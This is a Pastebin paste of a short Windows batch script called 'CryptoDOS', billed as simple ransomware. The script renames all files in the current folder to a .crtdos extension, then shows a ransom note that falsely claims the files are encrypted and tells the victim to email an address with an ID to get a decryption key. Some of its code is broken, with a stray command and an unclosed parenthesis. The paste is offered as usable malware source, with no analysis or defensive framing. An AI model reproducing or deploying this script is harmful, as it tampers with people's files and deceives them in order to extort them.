Advertisement
FlyFar

CryptoDOS: A Light and Simple Batch Ransomware rename extensions

Oct 24th, 2021
243
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 1.04 KB | None | 0 0
  1. @echo off
  2. color 02
  3. title CryptoDOS
  4. ren *.* *.crtdos
  5. rename
  6. echo ATTENTION!
  7. echo -------------------------------------------------------------------------------------------------------------
  8. echo All your files like photos, databases, documents and other important are encrypted!
  9. echo Don’t worry, you can return all your files!
  10. echo The only method of recovering files is to get an unique key for you.
  11. echo To get the key you need write on our e-mail and send with your ID:
  12. echo Our E-mail:
  13. echo decrypt@cryptobatch.com
  14. echo Your personal ID:
  15. echo 9315hTlGeRsMht5nsgsaoejm4RWx1y69zcacA5hSp3l60BnY8f3q
  16. echo -------------------------------------------------------------------------------------------------------------
  17. pause
  18. echo Type your decrypt key:
  19. set /p key=asd3SGd8723bqD7SH8JmYm298WxkjhasiuSDFS35Je5RhszHsdsals6
  20. if %key%==key (
  21. rename *.crtdos *.*
  22. echo Your files are decrypted!
  23. pause
  24. del D:\CryptoDOS.bat
  25. exit
  26. )
  27. if not %key%==key (
  28. echo Sorry, wrong key!
  29. echo Stay happily with your encrypted files...
  30. pause
  31. exit
  32. (
  33.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement